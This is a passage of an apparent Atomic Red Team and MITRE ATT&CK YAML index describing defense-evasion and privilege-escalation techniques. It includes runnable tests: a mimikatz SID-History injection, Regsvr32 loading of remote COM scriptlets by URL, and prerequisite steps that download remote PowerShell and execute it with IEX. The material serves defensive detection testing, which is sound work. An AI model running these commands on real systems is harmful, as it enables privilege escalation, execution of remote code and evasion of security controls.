to VirtualBox
type: path
default: C:\Program Files\Oracle\VirtualBox\VBoxManage.exe
virtualbox_download:
description: URL for the current installer for the Windows version of VirtualBox,
as of March 2022
type: url
default: https://download.virtualbox.org/virtualbox/6.1.32/VirtualBox-6.1.32-149290-Win.exe
virtualbox_installer:
description: Executable for the Virtualbox installer
type: string
default: VirtualBox-6.1.32-149290-Win.exe
dependency_executor_name: powershell
dependencies:
- description: 'VirtualBox must exist on disk at specified locations (#{virtualbox_exe})
'
prereq_command: 'if (Test-Path "#{virtualbox_exe}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$wc = New-Object System.Net.WebClient
$wc.DownloadFile("#{virtualbox_download}","PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}")
start-process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}" -ArgumentList "--silent" -Wait
- description: 'VBoxManage must exist on disk at specified locations (#{vboxmanage_exe})
'
prereq_command: 'if (Test-Path "#{vboxmanage_exe}") {exit 0} else {exit 1}
'
get_prereq_command: |
$wc = New-Object System.Net.WebClient
$wc.DownloadFile("#{virtualbox_download}","PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}")
start-process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\#{virtualbox_installer}" -ArgumentList "--silent" -Wait
executor:
name: command_prompt
elevation_required: false
command: |
"#{vboxmanage_exe}" createvm --name "#{vm_name}" --register
"#{vboxmanage_exe}" modifyvm "#{vm_name}" --firmware efi
"#{vboxmanage_exe}" startvm "#{vm_name}"
cleanup_command: |-
"#{vboxmanage_exe}" controlvm "#{vm_name}" poweroff
"#{vboxmanage_exe}" unregistervm "#{vm_name}" --delete
- name: Create and start Hyper-V virtual machine
auto_generated_guid: fb8d4d7e-f5a4-481c-8867-febf13f8b6d3
description: |
Create a simple Hyper-V VM (Windows native hypervisor) and start up the machine
Cleanup command stops and deletes the newly created VM
https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/
https://attack.mitre.org/techniques/T1564/006/
supported_platforms:
- windows
input_arguments:
vm_name:
description: Name of the new virtual machine
type: string
default: Atomic VM
dependencies:
- description: |
Hyper-V must be enabled on the system
Checks whether Hyper-V is enabled. If not, enables Hyper-V and forces a required restart
prereq_command: 'if ((Get-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V).State
= "Enabled") {exit 0} else {exit 1}
'
get_prereq_command: 'Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V
-All -Force
'
executor:
name: powershell
elevation_required: true
command: |-
$VM = "#{vm_name}"
New-VM -Name $VM -Generation 2
Set-VMFirmware $VM -EnableSecureBoot Off
Start-VM $VM
cleanup_command: |-
Stop-VM $VM -Force
Remove-VM $VM -Force
T1027.014:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b577dfc1-0177-4522-8d5a-782127c8592b
created: '2024-09-27T12:28:03.938Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/014
external_id: T1027.014
- source_name: polymorphic-blackberry
description: Blackberry. (n.d.). What is Polymorphic Malware?. Retrieved September
27, 2024.
url: https://www.blackberry.com/us/en/solutions/endpoint-security/ransomware-protection/polymorphic-malware
- source_name: polymorphic-sentinelone
description: SentinelOne. (2023, March 18). What is Polymorphic Malware? Examples
and Challenges. Retrieved September 27, 2024.
url: https://www.sentinelone.com/cybersecurity-101/threat-intelligence/what-is-polymorphic-malware
- source_name: polymorphic-medium
description: 'Shellseekercyber. (2024, January 7). Explainer: Packed Malware.
Retrieved September 27, 2024.'
url: https://medium.com/@shellseekerscyber/explainer-packed-malware-16f09cc75035
- source_name: polymorphic-linkedin
description: 'Sherwin Akshay. (2024, May 28). Techniques for concealing malware
and hindering analysis: Packing up and unpacking stuff. Retrieved September
27, 2024.'
url: https://www.linkedin.com/pulse/techniques-concealing-malware-hindering-analysis-packing-akshay-unijc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T19:59:00.006Z'
name: Polymorphic Code
description: "Adversaries may utilize polymorphic code (also known as metamorphic
or mutating code) to evade detection. Polymorphic code is a type of software
capable of changing its runtime footprint during code execution.(Citation:
polymorphic-blackberry) With each execution of the software, the code is mutated
into a different version of itself that achieves the same purpose or objective
as the original. This functionality enables the malware to evade traditional
signature-based defenses, such as antivirus and antimalware tools.(Citation:
polymorphic-sentinelone) \nOther obfuscation techniques can be used in conjunction
with polymorphic code to accomplish the intended effects, including using
mutation engines to conduct actions such as [Software Packing](https://attack.mitre.org/techniques/T1027/002),
[Command Obfuscation](https://attack.mitre.org/techniques/T1027/010), or [Encrypted/Encoded
File](https://attack.mitre.org/techniques/T1027/013).(Citation: polymorphic-linkedin)(Citation:
polymorphic-medium)\n"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Ye Yint Min Thu Htut, Active Defense Team, DBS Bank
- TruKno
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.1'
atomic_tests: []
T1134.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b7dc639b-24cd-482d-a7f1-8897eda21023
created: '2020-02-18T18:34:49.414Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1134/005
external_id: T1134.005
- source_name: Microsoft SID
description: Microsoft. (n.d.). Security Identifiers. Retrieved November 30,
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa379571.aspx
- source_name: Microsoft SID-History Attribute
description: Microsoft. (n.d.). Active Directory Schema - SID-History attribute.
Retrieved November 30, 2017.
url: https://msdn.microsoft.com/library/ms679833.aspx
- source_name: Microsoft Well Known SIDs Jun 2017
description: Microsoft. (2017, June 23). Well-known security identifiers in
Windows operating systems. Retrieved November 30, 2017.
url: https://support.microsoft.com/help/243330/well-known-security-identifiers-in-windows-operating-systems
- source_name: Microsoft Get-ADUser
description: Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved
November 30, 2017.
url: https://technet.microsoft.com/library/ee617241.aspx
- source_name: AdSecurity SID History Sept 2015
description: 'Metcalf, S. (2015, September 19). Sneaky Active Directory Persistence
#14: SID History. Retrieved November 30, 2017.'
url: https://adsecurity.org/?p=1772
- source_name: Microsoft DsAddSidHistory
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
url: https://msdn.microsoft.com/library/ms677982.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:16.316Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Alain Homewood, Insomnia Security
- Vincent Le Toux
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1134.005
atomic_tests:
- name: Injection SID-History with mimikatz
auto_generated_guid: 6bef32e5-9456-4072-8f14-35566fb85401
description: 'Adversaries may use SID-History Injection to escalate privileges
and bypass access controls. Must be run on domain controller
'
supported_platforms:
- windows
input_arguments:
sid_to_inject:
description: SID to inject into sidhistory
type: string
default: S-1-5-21-1004336348-1177238915-682003330-1134
sam_account_name:
description: Target account to modify
type: string
default: "$env:username"
mimikatz_path:
description: Mimikatz windows executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
'
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item
-Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction
Ignore -Force | Out-Null\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\"
-UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl
= (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url
| where-object { $_.endswith(\".zip\") }\n$mimikatz_exe = cmd /c echo #{mimikatz_path}\n$basePath
= Split-Path $mimikatz_exe | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\"
$basePath\n"
executor:
name: command_prompt
elevation_required: true
command: '#{mimikatz_path} "privilege::debug" "sid::patch" "sid::add /sid:#{sid_to_inject}
/sam:#{sam_account_name}" "exit"
'
cleanup_command: '#{mimikatz_path} "sid::clear /sam:#{sam_account_name}" "exit"
'
T1599:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166
created: '2020-10-19T16:08:29.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1599
external_id: T1599
- source_name: Kaspersky ThreatNeedle Feb 2021
description: Vyacheslav Kopeytsev and Seongsu Park. (2021, February 25). Lazarus
targets defense industry with ThreatNeedle. Retrieved October 27, 2021.
url: https://securelist.com/lazarus-threatneedle/100803/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:16.493Z'
name: Network Boundary Bridging
description: |-
Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). Adversaries may also target internal devices responsible for network segmentation and abuse these in conjunction with [Internal Proxy](https://attack.mitre.org/techniques/T1090/001) to achieve the same goals.(Citation: Kaspersky ThreatNeedle Feb 2021) In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Network Devices
x_mitre_version: '1.2'
atomic_tests: []
T1553:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b83e166d-13d7-4b52-8677-dff90c548fd7
created: '2020-02-05T14:54:07.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1553
external_id: T1553
- source_name: SpectorOps Code Signing Dec 2017
description: Graeber, M. (2017, December 22). Code Signing Certificate Cloning
Attacks and Defenses. Retrieved April 3, 2018.
url: https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec
- source_name: SpectorOps Subverting Trust Sept 2017
description: Graeber, M. (2017, September). Subverting Trust in Windows. Retrieved
January 31, 2018.
url: https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf
- source_name: Securelist Digital Certificates
description: Ladikov, A. (2015, January 29). Why You Shouldn’t Completely
Trust Files Signed with Digital Certificates. Retrieved March 31, 2016.
url: https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/
- source_name: Symantec Digital Certificates
description: Shinotsuka, H. (2013, February 22). How Attackers Steal Private
Keys from Digital Certificates. Retrieved March 31, 2016.
url: http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:16.766Z'
name: Subvert Trust Controls
description: "Adversaries may undermine security controls that will either warn
users of untrusted activity or prevent execution of untrusted programs. Operating
systems and security products may contain mechanisms to identify programs
or websites as possessing some level of trust. Examples of such features would
include a program being allowed to run because it is signed by a valid code
signing certificate, a program prompting the user with a warning because it
has an attribute set from being downloaded from the Internet, or getting an
indication that you are about to connect to an untrusted site.\n\nAdversaries
may attempt to subvert these trust mechanisms. The method adversaries use
will depend on the specific mechanism they seek to subvert. Adversaries may
conduct [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222)
or [Modify Registry](https://attack.mitre.org/techniques/T1112) in support
of subverting these controls.(Citation: SpectorOps Subverting Trust Sept 2017)
Adversaries may also create or steal code signing certificates to acquire
trust on target systems.(Citation: Securelist Digital Certificates)(Citation:
Symantec Digital Certificates) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
- Linux
x_mitre_version: '1.3'
atomic_tests: []
T1548.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0
created: '2020-01-30T14:40:20.187Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1548/004
external_id: T1548.004
- source_name: AppleDocs AuthorizationExecuteWithPrivileges
description: Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges.
Retrieved August 8, 2019.
url: https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg
- source_name: Carbon Black Shlayer Feb 2019
description: Carbon Black Threat Analysis Unit. (2019, February 12). New macOS
Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.
url: https://blogs.vmware.com/security/2020/02/vmware-carbon-black-tau-threat-analysis-shlayer-macos.html
- source_name: Death by 1000 installers; it's all broken!
description: Patrick Wardle. (2017). Death by 1000 installers; it's all broken!.
Retrieved August 8, 2019.
url: https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8
- source_name: OSX Coldroot RAT
description: Patrick Wardle. (2018, February 17). Tearing Apart the Undetected
(OSX)Coldroot RAT. Retrieved August 8, 2019.
url: https://objective-see.com/blog/blog_0x2A.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:16.860Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to
give application developers an easy way to perform operations with root privileges,
such as for application installation or updating. This API does not validate
that the program requesting root privileges comes from a reputable source
or has been maliciously modified. \n\nAlthough this API is deprecated, it
still fully functions in the latest releases of macOS. When calling this API,
the user will be prompted to enter their credentials but no checks on the
origin or integrity of the program are made. The program calling the API may
also load world writable files which can be modified to perform malicious
behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges
to obtain root privileges in order to install malicious software on victims
and install persistence mechanisms.(Citation: Death by 1000 installers; it's
all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot
RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036)
to trick the user into granting escalated privileges to malicious code.(Citation:
Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer
Feb 2019) This technique has also been shown to work by modifying legitimate
programs present on the machine that make use of this API.(Citation: Death
by 1000 installers; it's all broken!)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jimmy Astle, @AstleJimmy, Carbon Black
- Erika Noerenberg, @gutterchurl, Carbon Black
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- macOS
x_mitre_version: '1.1'
atomic_tests: []
T1218.010:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--b97f1d35-4249-4486-a6b5-ee60ccf24fab
created: '2020-01-23T19:52:17.414Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1218/010
external_id: T1218.010
- source_name: FireEye Regsvr32 Targeting Mongolian Gov
description: Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing
Techniques Used in Attacks Targeting the Mongolian Government. Retrieved
February 24, 2017.
url: https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html
- source_name: LOLBAS Regsvr32
description: LOLBAS. (n.d.). Regsvr32.exe. Retrieved July 31, 2019.
url: https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
- source_name: Microsoft Regsvr32
description: Microsoft. (2015, August 14). How to use the Regsvr32 tool and
troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.
url: https://support.microsoft.com/en-us/kb/249873
- source_name: Carbon Black Squiblydoo Apr 2016
description: 'Nolen, R. et al.. (2016, April 28). Threat Advisory: “Squiblydoo”
Continues Trend of Attackers Using Native OS Tools to “Live off the Land”.
Retrieved April 9, 2018.'
url: https://www.carbonblack.com/2016/04/28/threat-advisory-squiblydoo-continues-trend-of-attackers-using-native-os-tools-to-live-off-the-land/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:17.377Z'
name: 'Signed Binary Proxy Execution: Regsvr32'
description: |-
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. (Citation: Microsoft Regsvr32)
Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Casey Smith
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.2'
identifier: T1218.010
atomic_tests:
- name: Regsvr32 local COM scriptlet execution
auto_generated_guid: 449aa403-6aba-47ce-8a37-247d21ef0306
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls. Upon execution, calc.exe will be launched.
'
supported_platforms:
- windows
input_arguments:
filename:
description: Name of the local file, include path.
type: path
default: PathToAtomicsFolder\T1218.010\src\RegSvr32.sct
regsvr32path:
description: Default location of Regsvr32.exe
type: path
default: C:\Windows\system32
regsvr32name:
description: Default name of Regsvr32.exe
type: string
default: regsvr32.exe
dependency_executor_name: powershell
dependencies:
- description: 'Regsvr32.sct must exist on disk at specified location (#{filename})
'
prereq_command: 'if (Test-Path "#{filename}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{filename}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#{filename}"
executor:
command: '#{regsvr32path}\#{regsvr32name} /s /u /i:"#{filename}" scrobj.dll
'
name: command_prompt
- name: Regsvr32 remote COM scriptlet execution
auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36
description: |
Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
supported_platforms:
- windows
input_arguments:
url:
description: URL to hosted sct file
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct
regsvr32path:
description: Default location of Regsvr32.exe
type: path
default: C:\Windows\system32
regsvr32name:
description: Default name of Regsvr32.exe
type: string
default: regsvr32.exe
executor:
command: "#{regsvr32path}\\#{regsvr32name} /s /u /i:#{url} scrobj.dll\n"
name: command_prompt
- name: Regsvr32 local DLL execution
auto_generated_guid: '08ffca73-9a3d-471a-aeb0-68b4aa3ab37b'
description: 'Regsvr32.exe is a command-line program used to register and unregister
OLE controls. Upon execution, calc.exe will be launched.
'
supported_platforms:
- windows
input_arguments:
dll_name:
description: Name of DLL to Execute, DLL Should export DllRegisterServer
type: path
default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll
regsvr32path:
description: Default location of Regsvr32.exe
type: path
default: C:\Windows\system32
regsvr32name:
description: Default name of Regsvr32.exe
type: string
default: regsvr32.exe
dependency_executor_name: powershell
dependencies:
- description: 'AllTheThingsx86.dll must exist on disk at specified location
(#{dll_name})
'
prereq_command: 'if (Test-Path "#{dll_name}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{dll_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
executor:
command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe
/s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} )
'
name: command_prompt
- name: Regsvr32 Registering Non DLL
auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421
description: 'Replicating observed Gozi maldoc behavior registering a dll with
an altered extension
'
supported_platforms:
- windows
input_arguments:
dll_file:
description: Path to renamed dll file to be registered
type: path
default: "%temp%\\shell32.jpg"
regsvr32path:
description: Default location of Regsvr32.exe
type: path
default: C:\Windows\system32
regsvr32name:
description: Default name of Regsvr32.exe
type: string
default: regsvr32.exe
dependency_executor_name: command_prompt
dependencies:
- description: 'Test requires a renamed dll file
'
prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 )
'
get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
'
executor:
name: command_prompt
elevation_required: false
command: "#{regsvr32path}\\#{regsvr32name} /s #{dll_file}\n"
cleanup_command: "#{regsvr32path}\\#{regsvr32name} /U /s #{dll_file}\n"
- name: Regsvr32 Silent DLL Install Call DllRegisterServer
auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f
description: Regsvr32.exe is a command-line program used to register and unregister
OLE controls. Normally, an install is executed with /n to prevent calling
DllRegisterServer.
supported_platforms:
- windows
input_arguments:
dll_name:
description: Name of DLL to Install
type: string
default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx86.dll
regsvr32path:
description: Default location of Regsvr32.exe
type: string
default: C:\Windows\system32
regsvr32name:
description: Default name of Regsvr32.exe
type: string
default: regsvr32.exe
dependency_executor_name: powershell
dependencies:
- description: AllTheThingsx86.dll must exist on disk at specified location
(#{dll_name})
prereq_command: 'if (Test-Path "#{dll_name}") {exit 0} else {exit 1}
'
get_prereq_command: |-
New-Item -Type Directory (split-path "#{dll_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}"
executor:
command: '#{regsvr32path}\#{regsvr32name} /s /i "#{dll_name}"
'
name: command_prompt
T1036.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b
created: '2020-02-10T20:03:11.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1036/003
external_id: T1036.003
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
Retrieved September 12, 2024.
url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
- source_name: F-Secure CozyDuke
description: 'F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis.
Retrieved December 10, 2015.'
url: https://www.f-secure.com/documents/996508/1030745/CozyDuke
- source_name: LOLBAS Main Site
description: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and
also Libraries). Retrieved February 10, 2020.
url: https://lolbas-project.github.io/
- source_name: Huntress Python Malware 2025
description: 'Matthew Brennan. (2024, July 5). Snakes on a Domain: An Analysis
of a Python Malware Loader. Retrieved April 3, 2025.'
url: https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader
- source_name: Splunk Detect Renamed PSExec
description: 'Splunk. (2025, February 24). Detection: Detect Renamed PSExec.
Retrieved April 3, 2025.'
url: https://research.splunk.com/endpoint/683e6196-b8e8-11eb-9a79-acde48001122/
- source_name: The DFIR Report AutoHotKey 2023
description: The DFIR Report. (2023, February 6). Collect, Exfiltrate, Sleep,
Repeat. Retrieved April 3, 2025.
url: https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:18.517Z'
name: 'Masquerading: Rename System Utilities'
description: 'Adversaries may rename legitimate / system utilities to try to
evade security mechanisms concerning the usage of those utilities. Security
monitoring and control mechanisms may be in place for legitimate utilities
adversaries are capable of abusing, including both built-in binaries and tools
such as PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main Site)(Citation:
Huntress Python Malware 2025)(Citation: The DFIR Report AutoHotKey 2023)(Citation:
Splunk Detect Renamed PSExec) It may be possible to bypass those security
mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe).(Citation:
Elastic Masquerade Ball) An alternative case occurs when a legitimate utility
is copied or moved to a different directory and renamed to avoid detections
based on these utilities executing from non-standard paths.(Citation: F-Secure
CozyDuke)'
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Matt Anderson, @nosecurething, Huntress
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
